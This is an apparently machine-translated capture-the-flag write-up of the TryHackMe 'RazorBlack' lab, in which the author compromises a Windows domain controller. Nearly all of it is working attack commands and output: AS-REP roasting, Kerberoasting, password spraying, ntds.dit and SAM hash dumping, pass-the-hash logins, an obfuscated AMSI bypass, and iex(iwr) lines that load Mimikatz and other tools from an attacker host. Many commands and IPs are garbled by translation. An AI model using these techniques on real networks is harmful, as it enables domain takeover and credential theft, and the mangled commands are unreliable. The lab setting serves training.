disclaimer

The hosts infiltrated in this article are legally authorized. The tools and methods used in this article are only for learning and communication. Please do not use the tools and infiltration ideas used in this article for any illegal purposes. I am not responsible for any consequences arising therefrom, nor for any misuse or damage caused.

Service to detect

Chrysene ─(root💀kali)-[~/tryhackme/RazorBlack] └─# nmap-SV -pn 10.10.246.88 (https://nmap.org) at 2022-03-02 01:48 EST Nmap scan report for 10.10.246.107 Host is up (0.23s latency). Not shown: 986 closed tcp ports (reset) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-02 06:49:52Z) 111/tcp open rpcbind 2-4 (RPC #100000) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: raz0rblack.thm, Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC Over HTTP 1.0 636/ TCP Open tcpWrapped 2049/ TCP Open Mountd 1-3 (RPC #100005) 3268/ TCP Open LDAP Microsoft Windows Active Directory LDAP (Domain: raz0rblack.thm, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3389/tcp open ms-wbt-server Microsoft Terminal Services Service Info: Host: HAVEN-DC; OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) Scanned in 252.05 secondsCopy the code

The enumeration

Enum4linux, the domain should be raz0rblack.thm

Domain Name: RAZ0RBLACK
Domain Sid: S-1-5-21-3403444377-2687699443-13012745
Copy the code

Enumerating shared directories

└ ─ # showmount -e 10.10.246.107 Export list for 10.10.246.107: / users (everyone)Copy the code

Mount the remote directory to the local directory

Mount -t NFS 10.10.246.107 :/users/MNT /share -o nolockCopy the code

There are two files

Chrysene ─(root💀kali)-[/ MNT /share] ├ ─# ls employee_status.xlsx sbradle.txtCopy the code

View the file contents after copying the file to the local PC

Sbradle. TXT contents, Steven’s Flag

┌ ─ ─ (root 💀 kali) - ~ / tryhackme/RazorBlack └ ─ # cat sbradley. TXT � � THM {ab53e05c9a98def00314a14ccbfa8104}Copy the code

“Employee_status. XLSX”, “Ljudmila Vetrova”, “DA”

HAVEN SECRET HACKER's CLUB											
											
											
											
Name's			Role								
daven port			CTF PLAYER								
imogen royce			CTF PLAYER								
tamara vidal			CTF PLAYER								
arthur edwards			CTF PLAYER								
carl ingram			CTF PLAYER (INACTIVE)								
nolan cassidy			CTF PLAYER								
reza zaydan			CTF PLAYER								
ljudmila vetrova			CTF PLAYER, DEVELOPER,ACTIVE DIRECTORY ADMIN								
rico delgado			WEB SPECIALIST								
tyson williams			REVERSE ENGINEERING								
steven bradley			STEGO SPECIALIST								
chamber lin			CTF PLAYER(INACTIVE)								
Copy the code

Try creating a user dictionary user.txt

dport
iroyce
tvidal
aedwards
cingram
ncassidy
rzaydan
lvetrova
rdelgado
twilliams
sbradley
clin
Copy the code

Enumeration disables Kerberos preauthentication for the user

┌ ─ ─ (root 💀 kali) - ~ / tryhackme/RazorBlack └ ─ # python3 / usr/share/doc/python3 - impacket/examples/GetNPUsers py Raz0rblack. THM/usersfile/root/tryhackme/RazorBlack/user. TXT - dc - IP 10.10.246.107 Impacket V0.9.24.dev1 +20210906.175840.50 C76958 - Copyright 2021 SecureAuth Corporation [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] User lvetrova doesn't have UF_DONT_REQUIRE_PREAUTH set [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [email protected]:6d5f254f2b01b68443e01ac503a2ed67$bd6fadd530655734b4c85557dea62332df6604adef3cc687 42b422b989df3073a8590f6fdf9b1ff84a7f401560d303f3e9a43ebce53c9a5530a9a7180e48e2dcf094b6088013000db177e67cc41ccdf9f94d2048 0a860cbc943fe0d89e1bc7a237c9754d4987f643f923be5b29f2f2dd2b2f96ef916d2450d2b2a5232c60f693065e299cf93efb6a4d3c23e31d40392e 8271289c1765beebebc777aa1befb1acf7fabe45a6d9ecd0b92720c84db10178ca0838414cbcb551cc45b5682732ffb1561d6fed3e3959167ff4793d ac3bf9046abff4e0e65621398bdb5df010df1e7e62a282a79f753321983d4910d39537f1 [-] User sbradley doesn't have UF_DONT_REQUIRE_PREAUTH set [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)Copy the code

Come out with a Twilliams TGT

With John crack

┌ ─ ─ (root 💀 kali) - ~ / tryhackme/RazorBlack └ ─ # John hash. TXT - wordlist = / usr/share/wordlists unencrypted usernames. TXT Using default input encoding: UTF-8 Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status roastpotatoes ([email protected]) 1g 0:00:00:06 DONE (2022-03-02 0.1623g/s 685381p/s 685381c/s 685381c/s Rob3560.. roastedfish Use the "--show" option to display all of the cracked passwords reliably Session completed.Copy the code

Now you have a user credential:

Twilliams: roastpotatoesCopy the code

Enumeration SMB

Chrysene ─(root💀kali)-[~/tryhackme/RazorBlack] ├ ─# smbmap -u "twilliams" -p "roastpotatoes" -h [+] IP: 10.10.246.107:445 Name: raz0rblack.thm Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share IPC$ READ ONLY Remote IPC NETLOGON READ ONLY Logon server share SYSVOL READ ONLY Logon server share trash NO ACCESS Files Pending for deletionCopy the code

spray the hash

Use the same password to hash spray the user names collected above

Chrysene ─(root💀kali)-[~/tryhackme/RazorBlack] ├ ─# crackmapexec 08.07.07.00 -u user. TXT -p pass. TXT SMB 08.07.00 445 Have-DC [*] Windows 10.0 Build 17763 x64 (name: Have-DC) (domain:raz0rblack.thm) (signing:True) (SMBv1:False) SMB 10.10.246.107 445 HAVEN-DC [-] RAZ0rblack. THM \dport: Roastpotatoes STATUS_LOGON_FAILURE SMB 10.10.246.107 445 HAVEN-DC [-] RAZ0rblack. THM \iroyce: Roastpotatoes STATUS_LOGON_FAILURE SMB 10.10.246.107 445 HAVEN-DC [-] Raz0rblack.thm \tvidal: Roastpotatoes STATUS_LOGON_FAILURE SMB 10.10.246.107 445 HAVEN-DC [-] Raz0rblack. THM \ aEDWARDS: Roastpotatoes STATUS_LOGON_FAILURE SMB 10.10.246.107 445 HAVEN-DC [-] Raz0rblack. THM \cingram: Roastpotatoes STATUS_LOGON_FAILURE SMB 10.10.246.107 445 HAVEN-DC [-] Raz0rblack.thm \ncassidy: Roastpotatoes STATUS_LOGON_FAILURE SMB 10.10.246.107 445 HAVEN-DC [-] Raz0rblack. THM \rzaydan: Roastpotatoes STATUS_LOGON_FAILURE SMB 10.10.246.107 445 HAVEN-DC [-] Raz0rblack. THM \lvetrova: Roastpotatoes STATUS_LOGON_FAILURE SMB 10.10.246.107 445 HAVEN-DC [-] Raz0rblack. THM \rdelgado: Roastpotatoes STATUS_LOGON_FAILURE SMB 10.10.246.107 445 HAVEN-DC [-] raz0rblack.thm\sbradley:roastpotatoes STATUS_PASSWORD_MUST_CHANGECopy the code

You see the following set of user credentials prompting you to change your password

sbradley:roastpotatoes
Copy the code

Change a new password with smbpasswd.py

┌ ─ ─ (root 💀 kali) - ~ / tryhackme/RazorBlack └ ─ # python3 / root/impacket/examples/the smbpasswd py RAZ0RBLACK. THM/sbradley: [email protected] - newpass 'newpassword123 1 ⨯ Impacket V0.9.24.dev1 +20210906.175840.50 C76958 - Copyright 2021 SecureAuth Corporation [!]  Password is expired, trying to bind with a null session. [*] Password was changed successfully.Copy the code

Looking at the SMB share directory again, you have read permission on Trash

Chrysene ─(root💀kali)-[~/tryhackme/ trash] ├ ─# smbmap -u "sbradley" -p "newPassword123" -h 10.10.246.88 [+] IP: 10.10.246.107:445 Name: 10.10.246.107 Disk Permissions Comment ---- ----------- ------- ADMIN$NO ACCESS Remote ADMIN C$NO ACCESS Default share  IPC$ READ ONLY Remote IPC NETLOGON READ ONLY Logon server share SYSVOL READ ONLY Logon server share trash READ ONLY Files Pending for deletionCopy the code

Viewing Shared Files

Chrysene ─(root💀kali)-[~/tryhackme/ trash] ├ ─# smbclient -U's Bradley % newPassword123 '\\\\ 10.10.246.88 \\trash Try "help"  to get a list of possible commands. smb: \> ls . D 0 Tue Mar 16 02:01:28 2021 .. D 0 Tue Mar 16 02:01:28 2021 chat_log_20210222143423.txt A 1340 Thu Feb 25 14:29:05 2021 experiment_gone_wrong.zip A 18927164 Tue Mar 16 02:02:20 2021 sbradley.txt A 37 Sat Feb 27 14:24:21 2021Copy the code

chat_log_20210222143423.txt

├ ──(root💀kali)-[~/tryhackme/ trash] └─# cat chat_log_2022222280.txt sbradley> Hey Administrator our machine has  the newly disclosed vulnerability for Windows Server 2019. Administrator> What vulnerability?? sbradley> That new CVE-2020-1472 which is called ZeroLogon has released a new PoC. Administrator> I have given you the last warning. If you exploit this on this Domain Controller as you did previously on our old Ubuntu server with dirtycow, I swear I will kill your WinRM-Access. sbradley> Hey you won't believe what I am seeing. Administrator> Now, don't say that you ran the exploit. sbradley> Yeah, The exploit works great it needs nothing like credentials. Just give it IP and domain name and it resets the Administrator pass to an empty hash. sbradley> I also used some tools to extract ntds. dit and SYSTEM.hive and transferred it into my box. I love running secretsdump.py on those files and dumped the hash. Administrator> I am feeling like a new cron has been issued in my body named heart attack which will be executed within the next minute. Administrator> But, Before I die I will kill your WinRM access.......... sbradley> I have made an encrypted zip containing the ntds.dit and the SYSTEM.hive and uploaded the zip inside the trash  share. sbradley> Hey Administrator are you there ... sbradley> Administrator ..... The administrator died after this incident. Press F to pay respectsCopy the code

Zip files need to be decrypted, converted to a format that John can read with zip2John, and then decrypted with John

├ ──(root💀kali)-[~/tryhackme/ trash] # /usr/sbin/zip2john experiment_gone_wrong. Zip > zip.hash ver 2.0efH 5455 efh  7875 experiment_gone_wrong.zip/system.hive PKZIP Encr: TS_chk, cmplen=2941739, decmplen=16281600, CRC =BDCCA7E2 TS =591C CS =591C Type =8 ver 2.0 EFH 5455 EFH 7875 experiment_gone_wrong.zip/ ntpS.dit PKZIP Encr: TS_chk, cmplen=15985077, decmplen=58720256, crc=68037E87 ts=5873 cs=5873 type=8 NOTE: It is assumed that all files in each archive have the same password. If that is not the case, the hash may be uncrackable. To avoid this, Use option-o to pick a file at a time. Chrysene ─(root💀kali)-[~/tryhackme/RazorBlack] ├ ─# John zip --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (PKZIP [32/64]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status electromagnetismo (experiment_gone_wrong.zip) 1g 0:00:00:01 DONE (2022-03-02 04:27) 0.5882g/s 4929Kp/s 4929Kc/s 4929Kc/s ELFO2009.. elboty2009 Use the "--show" option to display all of the cracked passwords reliably Session completed.Copy the code

The password for cracking the ZIP file is: Electromagnetismo

Check the file

┌ ─ ─ (root 💀 kali) - ~ / tryhackme RazorBlack/experiment_gone_wrong ls NTDS. Dit system. HiveCopy the code

Dit file is a binary file on the domain controller in the domain environment. It is the main active directory database. Its file path is %SystemRoot%\ Ntds \ntds.dit

Let’s just say it’s a database in AD

Use secretsdump. Py to export the data from ntds. dit. Note that there is a lot of data here and you need to redirect it to a new file user.hash

python /root/impacket-master/examples/secretsdump.py -ntds ./ntds.dit -system ./system.hive LOCAL > user.hash 
Copy the code

Looking at this file, NTML hash information for the user appears

─ ─ (root 💀 kali) - ~ / tryhackme RazorBlack/experiment_gone_wrong └ ─ # head user. 20 Impacket hash - n V0.9.24.dev1 +20210906.175840.50 C76958 - Copyright 2021 SecureAuth Corporation [*] Target system bootKey: 0x17a0a12951d502bb3c14cf1d495a71ad [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Searching for pekList, be patient [*] PEK # 0 found and decrypted: 84bf0a79cd645db4f94b24c35cfdf7c7 [*] Reading and decrypting hashes from ./ntds.dit Administrator:500:aad3b435b51404eeaad3b435b51404ee:1afedc472d0fdfe07cd075d36804efd0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HAVEN-DC$:1000:aad3b435b51404eeaad3b435b51404ee:4ea59b8f64c94ec66ddcfc4e6e5899f9::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:703a365974d7c3eeb80e11dd27fb0cb3::: <skip>Copy the code

The file above needs to be formatted into a pure NTML file, such as

1afedc472d0fdfe07cd075d36804efd0
31d6cfe0d16ae931b73c59d7e0c089c0
4ea59b8f64c94ec66ddcfc4e6e5899f9
...
<skip>
Copy the code

Then hash spray with the following command

Crackmapexec SMB 10.10.246.107 -u/root/tryhackme/RazorBlack/user. TXT - H user. The hashCopy the code

Get a valid set of hashes:

lvetrova:f220d3988deb3f516c73f40ee16c431d
Copy the code

pass the hash

Log in with evil-winrm and get the Foodhold

┌ ─ ─ (root 💀 kali) - ~ / tryhackme/RazorBlack └ ─ # evil - winrm -i 10.10.246.107 -u lvetrova -h f220d3988deb3f516c73f40ee16c431d 1 ⨯ evil-Winrm shell v3.2 Warning: Remote path Completions is disabled due to Ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\lvetrova\Documents> whoami raz0rblack\lvetrovaCopy the code

Get the first user flag using the following two lines of code

*Evil-WinRM* PS C:\Users\lvetrova> $Credential = Import-Clixml -Path "lvetrova.xml"
*Evil-WinRM* PS C:\Users\lvetrova> $Credential.GetNetworkCredential().password
THM{694362e877adef0d85a92e6d17551fe4}
Copy the code

Elevated privileges

Bypassing Powershell to enforce policies

$env:PSExecutionPolicyPreference="bypass"
Copy the code

Bypass AMSI

S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ([TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE (('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(("{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
Copy the code

Load the PowerView and SharpHound from the remote server into the target’s memory

Iex (iwr - UseBasicParsing http://10.11.63.196/PowerView.ps1 iex (iwr http://10.11.63.196/SharpHound.ps1 - UseBasicParsing) iex (iwr - UseBasicParsing http://10.11.63.196/Invoke-Mimikatz.ps1Copy the code

You can see from Bloodhound that Xyan1d3 can remotely log in to the DC server and is a Kerberoastablle user who belongs to the Backup user group, making it a valuable user

View the SPN of a user

Evil-WinRM* PS C:\Users\lvetrova\Documents> Get-NetUser -spn |select userprincipalname,serviceprincipalname

userprincipalname      serviceprincipalname
-----------------      --------------------
                       kadmin/changepw
[email protected] HAVEN-DC/xyan1d3.raz0rblack.thm:60111

Copy the code

There is an Xyan1d3 SPN, which is exported with getUserspns.py

┌ ─ ─ (root 💀 kali) - ~ / tryhackme/RazorBlack └ ─ # python3 / root/impacket/examples/GetUserSPNs py raz0rblack. THM/lvetrova -hashes f220d3988deb3f516c73f40ee16c431d:f220d3988deb3f516c73f40ee16c431d -outputfile hash.txt Impacket V0.9.25.dev1 +20220218.140931.6042675 A - Copyright 2021 SecureAuth Corporation ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation ------------------------------------- ------- ---------------------------------------------------------- -------------------------- --------- ---------- HAVEN-DC/xyan1d3.raz0rblack.thm:60111 xyan1d3 CN=Remote Management Users,CN=Builtin,DC=raz0rblack,DC=thm 2021-02-23 10:17:17. 715160 < never >Copy the code

Crack with John

┌ ─ ─ (root 💀 kali) - ~ / tryhackme/RazorBlack └ ─ # John hash. TXT - wordlist = / usr/share/wordlists unencrypted usernames. TXT Using default input encoding: UTF-8 Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status cyanide9amine5628 (?) 1G 0:00:00:05 DONE (2022-03-02 09:41) 0.1748g/s 1550Kp/s 1550Kc/s 1550Kc/s cybermilk0.. cy2802341 Use the "--show" option to display all of the cracked passwords reliably Session completedCopy the code

Cyanide9amine5628 is the plaintext password for xyan1D3

Login:

Evil-winrm -I 10.10.246.107 -u xyan1d3 -p Cyanide9amine5628Copy the code

Get the second user flag using the following two lines of code

*Evil-WinRM* PS C:\Users\xyan1d3> $Credential = Import-Clixml -Path "xyan1d3.xml"
*Evil-WinRM* PS C:\Users\xyan1d3> $Credential.GetNetworkCredential().password
LOL here it is -> THM{62ca7e0b901aa8f0b233cade0839b5bb}
Copy the code

View current user permissions

*Evil-WinRM* PS C:\Users\xyan1d3> whoami /all USER INFORMATION ---------------- User Name SID ================== ============================================ raz0rblack\xyan1d3 S-1-5-21-3403444377-2687699443-13012745-1106 GROUP INFORMATION ----------------- Group Name Type SID Attributes ========================================== ================  ============ ================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\High Mandatory Level Label S-1-16-12288 PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled SeShutdownPrivilege Shut down the system Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled USER CLAIMS INFORMATION ----------------------- User claims unknown. Kerberos support for Dynamic Access Control  on this device has been disabled.Copy the code

SeBackupPrivilege and SeRestorePrivilege

This SeBackupPrivilege ability is described in Hacktricks

This privilege causes the system to grant all read access control to any file (only read). Use it to read the password hashes of local Administrator accounts from the registry and then use “psexec” or “wmicexec” with the hash (PTH). This attack won’t work if the Local Administrator is disabled, or if it is configured that a Local Admin isn’t admin if he is connected remotely.

We can use this capability to read any file including hash files, which we can use to read Administrator hashes

About SeRestorePrivilege

Write access control to any file on the system, regardless of the files ACL. You can modify services, DLL Hijacking, Set debugger (Image File Execution Options)… A lot of options to escalate.

DLL hijacking can be performed by writing DLL files to any path

Because DLL hijacking also requires the ability to restart system services, we focused on the utilization of SeBackupPrivilege

I did some research and found this article

Export the Sam and system files to the local PC

reg save HKLM\SAM sambkup.hiv

reg save HKLM\SYSTEM systembkup.hiv
Copy the code

Export NTML hash using MIMikatz (note that bypass Powershell policy and AMSI are required for each login)

Evil-WinRM* PS C:\Users\xyan1d3\Documents> Invoke-Mimikatz -Command '"lsadump::sam /sam:sambkup.hiv /system:systembkup.hiv"'.#####. Mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18.## ^ ##." A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( [email protected] ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz(powershell) # lsadump::sam /sam:sambkup.hiv /system:systembkup.hiv Domain : HAVEN-DC SysKey : f1582a79dd00631b701d3d15e75e59f6 Local SID : S-1-5-21-1320649623-3804182013-2902712059 SAMKey : eaa05099b2f12f633fca797270e3e4fa RID : 000001f4 (500) User : Administrator Hash NTLM: 9689931bed40ca5a2ce1218210177f0c RID : 000001f5 (501) User : Guest RID : 000001f7 (503) User : DefaultAccount RID : 000001f8 (504) User : WDAGUtilityAccountCopy the code

Log in to the Administrator account using hash pass

─ ─ (root 💀 kali) - ~ / tryhackme/RazorBlack └ ─ # evil - winrm -i 10.10.246.107 -u Administrator - H 9689931 bed40ca5a2ce1218210177f0c Evil - WinRM shell v3.2 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami raz0rblack\administratorCopy the code

You have obtained system administrator privileges

Read the root XML

* evil-winrm * PS C:\Users\Administrator> cat root. XML <Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"> <Obj RefId="0"> <TN RefId="0"> <T>System.Management.Automation.PSCredential</T> <T>System.Object</T> </TN> <ToString>System.Management.Automation.PSCredential</ToString> <Props> <S N="UserName">Administrator</S> <SS N="Password">44616d6e20796f752061726520612067656e6975732e0a4275742c20492061706f6c6f67697a6520666f72206368656174696e67207 96f75206c696b6520746869732e0a0a4865726520697320796f757220526f6f7420466c61670a54484d7b31623466343663633466626134363334383 237336431386463393164613230647d0a0a546167206d65206f6e2068747470733a2f2f747769747465722e636f6d2f5879616e3164332061626f757 42077686174207061727420796f7520656e6a6f796564206f6e207468697320626f7820616e642077686174207061727420796f75207374727567676 c656420776974682e0a0a496620796f7520656e6a6f796564207468697320626f7820796f75206d617920616c736f2074616b652061206c6f6f6b206 17420746865206c696e75786167656e637920726f6f6d20696e207472796861636b6d652e0a576869636820636f6e7461696e7320736f6d65206c696 e75782066756e64616d656e74616c7320616e642070726976696c65676520657363616c6174696f6e2068747470733a2f2f7472796861636b6d652e6 36f6d2f726f6f6d2f6c696e75786167656e63792e0a</SS> </Obj> </Objs>Copy the code

Hexdecode on hackbar for

Damn you are a genius.
But, I apologize for cheating you like this.

Here is your Root Flag
THM{1b4f46cc4fba46348273d18dc91da20d}

Tag me on https://twitter.com/Xyan1d3 about what part you enjoyed on this box and what part you struggled with.

If you enjoyed this box you may also take a look at the linuxagency room in tryhackme.
Which contains some linux fundamentals and privilege escalation https://tryhackme.com/room/linuxagency.

Copy the code

Another cookie.json content

*Evil-WinRM* PS C:\Users\Administrator> cat cookie.json { auth : "TG9vayB0aGlzIGlzIHlvdXIgY29va2llLgpGdW5GYWN0IDogVGhpcyBjb29raWUgY2FuIGNoYW5nZSBpdHMgb3duIGZsYXZvdXIgYXV0b21hdGljYWxseS4 gVG8gdGVzdCBpdCBqdXN0IHRoaW5rIG9mIHlvdXIgZmF2b3VyaXRlIGZsYXZvdXIuCgpBbmQgc3RvcCBwdXR0aW5nICdPUiAnMSc9JzEgaW5zaWRlIGxvZ2l uLnBocAoKRW5qb3kgeW91ciBDb29raWU=" }Copy the code

After the base64decode:

Look this is your cookie.
FunFact : This cookie can change its own flavour automatically. To test it just think of your favourite flavour.

And stop putting 'OR '1'='1 inside login.php

Enjoy your Cookie
Copy the code

Go to another user folder

*Evil-WinRM* PS C:\Users\twilliams> ls Directory: C:\Users\twilliams Mode LastWriteTime Length Name ---- ------------- ------ ---- d-r--- 9/15/2018 12:19 AM Desktop d-r--- 2/25/2021 10:18 AM Documents d-r--- 9/15/2018 12:19 AM Downloads d-r--- 9/15/2018 12:19 AM Favorites d-r--- 9/15/2018 12:19 AM Links d-r--- 9/15/2018 12:19 AM Music d-r--- 9/15/2018 12:19 AM Pictures d----- 9/15/2018 12:19 AM Saved Games d-r--- 9/15/2018 12:19 AM Videos -a---- 2/25/2021 10:20 AM 80 definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely _definitely_definitely_definitely_definitely_definitely_definitely_definitely_de finitely_definitely_not_a_flag.exeCopy the code

Exe file with a long name, tried to execute but failed

Directly read

*Evil-WinRM* PS C:\Users\twilliams> cat definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely _definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_not_a_flag.exe THM{5144f2c4107b7cab04916724e3749fb0}Copy the code

What is the complete top secret?

Download this image to C:\Program Files\Top Secret\top_secret.png

A: Wq